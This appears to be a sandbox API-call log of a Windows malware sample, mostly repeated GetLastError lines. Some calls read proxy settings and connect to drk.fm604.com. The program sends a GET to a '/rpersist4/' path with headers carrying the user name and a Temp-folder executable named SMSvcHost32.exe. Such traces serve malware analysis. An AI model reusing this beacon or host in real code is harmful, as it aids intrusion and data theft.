	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.437] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.438] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.439] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.440] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.441] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.442] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.443] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] GetLastError () returned 0x0
	[0080.444] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26af8d8 | out: phkResult=0x26af8d8*=0x224) returned 0x0
	[0080.444] RegQueryValueExW (in: hKey=0x224, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26af8dc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x26af8dc*=0x4) returned 0x0
	[0080.444] RegQueryValueExW (in: hKey=0x224, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x72dbb0, lpcbData=0x26af8dc*=0x4 | out: lpType=0x0, lpData=0x72dbb0*=0x0, lpcbData=0x26af8dc*=0x4) returned 0x0
	[0080.444] RegCloseKey (hKey=0x224) returned 0x0
	[0080.445] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0080.589] InternetConnectA (hInternet=0xcc0004, lpszServerName="drk.fm604.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.590] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] GetLastError () returned 0x0
	[0080.591] lstrlenA (lpString="/rpersist4/2091998236") returned 21
	[0080.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26afe8c, cbMultiByte=-1, lpWideCharStr=0x7b6938, cchWideChar=22 | out: lpWideCharStr="/rpersist4/2091998236") returned 22
	[0080.591] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/2091998236", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0080.592] wsprintfW (in: param_1=0x7bbab0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0080.592] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0080.592] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0080.592] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7bbec8, nSize=0x26af2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x26af2bc) returned 0x1
	[0080.593] wsprintfW (in: param_1=0x7bbab0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0080.593] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0080.593] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0080.593] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26af2c4 | out: phkResult=0x26af2c4*=0x2a8) returned 0x0
	[0080.593] RegQueryValueExW (in: hKey=0x2a8, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26af29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x26af29c*=0x0) returned 0x2
	[0080.593] RegQueryValueExW (in: hKey=0x2a8, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26af29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x26af29c*=0x0) returned 0x2
	[0080.593] RegQueryValueExW (in: hKey=0x2a8, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26af29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x26af29c*=0x0) returned 0x2
	[0080.593] RegCloseKey (hKey=0x2a8) returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.593] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.594] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.595] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.596] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.597] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetLastError () returned 0x0
	[0080.598] GetComputerNameW (in: lpBuffer=0x7bbec8, nSize=0x26af400 | out: lpBuffer="X2VS1CUM", nSize=0x26af400) returned 1
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
